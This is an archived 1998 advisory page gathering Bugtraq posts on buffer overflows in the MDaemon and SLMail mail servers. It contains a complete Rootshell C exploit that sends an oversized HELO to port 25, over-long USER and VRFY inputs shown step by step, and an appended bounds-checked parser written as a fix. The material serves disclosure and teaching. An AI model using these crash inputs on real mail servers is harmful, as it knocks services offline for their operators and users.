MDaemon/SLMail Mail server overflows

Summary

Description: Most Windows servers in general seem to have horrific security. Here is info on overflows in the MDaemon SMTP/POP server and the Seattle Labs SLMail server. Many Macintosh servers also have these problems, and even UNIX isn't always immune to poor coding.
Author: Alvaro Martinez Echevarria <alvaro-bugtraq@LANDER.ES>
Compromise: Crash the server; perhaps arbitrary code could be executed.
Vulnerable Systems: Windows boxes running a vulnerable version of MDaemon, Seattle Labs SLMail, and several other crappy Windows servers.
Date: 11 March 1998

Details

Date: Wed, 11 Mar 1998 05:33:53 +0100
From: Alvaro Martinez Echevarria <alvaro-bugtraq@LANDER.ES>
To: BUGTRAQ@NETSPACE.ORG
Subject: DoS (and possibly more) on MDaemon for NT/95

Hi there.

Around a month ago I sent the following message to
sales@mdaemon.com.  In a few words: there's a security problem in
the SMTP/POP/WebPop software they provide for evaluation (and
probably also in the commercial version they sell, see
www.mdaemon.com), that lets you kill SMTP and POP services
provided that you can connect to a sort of configuration port the
programs use (in the configuration I tested the port was N+1, for
N being the port used by WebPop). My knowledge on Windoze
asymptotically approaches zero, so I cannot give much more
details. I haven't received any interesting message from
@mdaemon.com, apart from "we'll forward this information to our
developers" (?); and I've seen nothing related to this security
problem in their web so far, so the time has come to post to
bugtraq, I guess. Possible workaround: block that port using a
firewall. Just in case anyone out there is crazy enough to use
this thing ;-).

Regards.

.------------------------------------------------------------------.
|   Alvaro Martínez Echevarría   |      LANDER SISTEMAS            |
|        alvaro@lander.es        |      Pº Castellana, 121         |
`--------------------------------|      28046 Madrid, SPAIN        |
                                 |      Tel: +34-1-5562883         |
                                 |      Fax: +34-1-5563001         |
                                 `---------------------------------'
---------- Forwarded message ----------
From: Alvaro Martinez Echevarria <alvaro@lander.es>
To: sales@mdaemon.com
Date: Sun, 15 Feb 1998 19:59:03 +0100 (CET)
Subject: DoS attack on MDaemon

Hi there.
I have found a really easy to use DoS attack on your MDaemon
server, which some people here in my company have been evaluating.
They asked me to take a look at the security of the product, and
the very first thing I tried just brought the SMTP/POP services down.
It was easy: I connected to a port whose greeting says "+OK
xxx.xxx MDCONFIG Interface Ready", and after some trial and
error this is what I found:

VERS 3.0
+OK MDConfig v3.0 acceptable.
USER aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa[...]

The "a" here needs to be repeated a lot of times, say 2000. And
after that, voilà: "Connection closed by foreign host" and let die
the SMTP and POP services. As you should know, this same bug
could be used in a more clever way to execute arbitrary code in
any server that is using your MDaemon software. I think you
should correct this problem right away, and pay more attention
to bounds checking in your future development.
Regards.

Date: Wed, 11 Mar 1998 00:44:45 -0600
From: Aleph One <aleph1@DFW.NET>
To: BUGTRAQ@NETSPACE.ORG
Subject: MDaemon SMTP Server Buffer Overflow's

[ forwarded from rootshell ]

Since a similar bug was just released about the MDaemon Config Manager on
Bugtraq, we decided to release our MDaemon exploit early.  After the exploit
you will find the original Bugtraq post.  Note that MDaemon has known about
this bug since February.  Look for our upcoming paper on SMTP server
security.

/*
 * MDaemon SMTP server for Windows buffer overflow exploit
 *
 * http://www.mdaemon.com - if you dare...
 *
 * Tested on MDaemon 2.71 SP1
 *
 * http://www.rootshell.com/
 *
 * Released 3/10/98
 *
 * (C) 1998 Rootshell All Rights Reserved
 *
 * For educational use only.  Distribute freely.
 *
 * Note: This exploit will also crash the Microsoft Exchange 5.0 SMTP mail
 *       connector if SP2 has NOT been installed.
 *
 * Danger!
 *
 * A malicious user could use this bug to execute arbitrary code on the
 * remote system.
 *
 */

#include <stdio.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <string.h>
#include <strings.h>    /* bzero, bcopy */
#include <stdlib.h>
#include <unistd.h>

int main(int argc, char *argv[])
{
  struct sockaddr_in sin;
  struct hostent *hp;
  char *buffer;
  int sock, i;

  if (argc != 2) {
    printf("usage: %s <smtp server>\n", argv[0]);
    exit(1);
  }
  hp = gethostbyname(argv[1]);
  if (hp == NULL) {
    printf("Unknown host: %s\n", argv[1]);
    exit(1);
  }
  bzero((char *) &sin, sizeof(sin));
  bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length);
  sin.sin_family = hp->h_addrtype;
  sin.sin_port = htons(25);
  sock = socket(AF_INET, SOCK_STREAM, 0);
  if (sock < 0) {
    perror("socket");
    exit(1);
  }
  if (connect(sock, (struct sockaddr *) &sin, sizeof(sin)) < 0) {
    perror("connect");
    exit(1);
  }
  /* "HELO " followed by 4096 'x' characters and CRLF: far longer than the
   * server's command buffer, which is what triggers the overflow. */
  buffer = (char *) malloc(10000);
  if (buffer == NULL) {
    perror("malloc");
    exit(1);
  }
  strcpy(buffer, "HELO ");
  for (i = 0; i < 4096; i++)
    strcat(buffer, "x");
  strcat(buffer, "\r\n");
  write(sock, buffer, strlen(buffer));
  close(sock);
  free(buffer);
  return 0;
}

-- cut here --

Rootshell Note: The config manager appears to run on port 8081 and is
configurable.  In the version that we tested (2.71 SP1) this buffer overflow
did not exist in the remote config manager, and required a remote version of
3.7 and not 3.0.

Date: Wed, 11 Mar 1998 20:44:56 -0500
From: Steven <steven@EFNI.COM>
To: BUGTRAQ@NETSPACE.ORG
Subject: SLMail 2.6 DoS

Hello,

        I have recently found a quite serious DoS attack for the SLMail
2.6 email daemon (www.seattlelabs.com/slmail). A long string of text
after a command makes the program crash.  I have only tested this on
2.6, so I'm not sure if other versions are vulnerable.

craphole:~$ telnet www.victim.com 25
Trying 555.55.555.55...
Connected to www.victim.com.
Escape character is '^]'.
220 www.victim.com Smtp Server SLMail v2.6 Ready ESMTP spoken here
vrfy
dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
Connection closed by foreign host.

craphole:~$ telnet www.victim.com 25
Trying 555.55.555.55...
telnet: Unable to connect to remote host: Connection refused
craphole:~$

        It will stay unresponsive until manually restarted. I haven't
mailed Seattle Labs about this, but I'm sure they'll figure it out.

Later,

Cisc0 @ Undernet
steven@efni.com
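The three posts above describe one bug: an SMTP or MDCONFIG command argument copied into a fixed-size buffer with no length check (HELO with 4096 bytes, USER with 2000, VRFY with a few hundred). As an added example, not code from the posts, from Rootshell, or from MDaemon or SLMail, here is the bounds-checked command parser a mail daemon should have used: it caps the line at the 512-byte RFC 821 limit and the argument at a fixed size, and rejects anything longer instead of overflowing. The limits, the function names and the parse_repeated input builder are assumptions made for this example.

```c
#include <string.h>

/* Example limits: RFC 821 caps a command line at 512 bytes including CRLF.
 * The verb/argument buffers are fixed-size, as in the vulnerable daemons,
 * but every copy below is bounded by them. */
#define MAX_LINE 512
#define VERB_SZ  8
#define ARG_SZ   256
enum parse_result { CMD_OK, CMD_TOO_LONG, CMD_NO_VERB, CMD_ARG_TOO_LONG };
struct smtp_cmd { char verb[VERB_SZ]; char arg[ARG_SZ]; };  /* NUL-terminated */

/* Parse one raw command line (trailing CRLF optional) into *cmd.  An
 * over-long line or argument is reported, never written past a buffer. */
enum parse_result smtp_parse_command(const char *line, struct smtp_cmd *cmd)
{
    const char *nul = memchr(line, '\0', MAX_LINE + 1);   /* bounded scan */
    size_t len = nul ? (size_t)(nul - line) : MAX_LINE + 1, n;
    const char *end, *sp;
    memset(cmd, 0, sizeof(*cmd));
    if (len > MAX_LINE)
        return CMD_TOO_LONG;               /* reject before copying anything */
    end = line + len;
    while (end > line && (end[-1] == '\r' || end[-1] == '\n'))
        end--;                             /* drop CR/LF */
    sp = memchr(line, ' ', (size_t)(end - line));
    n = (size_t)((sp ? sp : end) - line);  /* verb = text before first space */
    if (n == 0 || n >= VERB_SZ)
        return CMD_NO_VERB;
    memcpy(cmd->verb, line, n);            /* bounded: n < VERB_SZ */
    n = sp ? (size_t)(end - sp - 1) : 0;   /* argument = text after the space */
    if (n >= ARG_SZ)
        return CMD_ARG_TOO_LONG;           /* the case all three posts trigger */
    memcpy(cmd->arg, sp ? sp + 1 : end, n); /* bounded: n < ARG_SZ */
    return CMD_OK;
}

/* Constructed input: "<verb> " + n copies of c + CRLF, the shape of the
 * HELO/USER/VRFY lines in the posts, fed through the checks above. */
enum parse_result parse_repeated(const char *verb, char c, size_t n, struct smtp_cmd *cmd)
{
    static char line[8192];
    size_t v = strlen(verb);
    if (v + n + 4 > sizeof line)
        return CMD_TOO_LONG;               /* does not even fit the scratch buffer */
    memcpy(line, verb, v); line[v] = ' ';
    memset(line + v + 1, c, n);
    memcpy(line + v + 1 + n, "\r\n", 3);   /* copies the terminating NUL too */
    return smtp_parse_command(line, cmd);
}
```

With these limits the exact inputs from the posts (HELO plus 4096 bytes, USER plus 2000 bytes) fail the line-length check before any copy, and a VRFY argument just over the argument size fails the second check.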

This page is part of Fyodor's exploit world.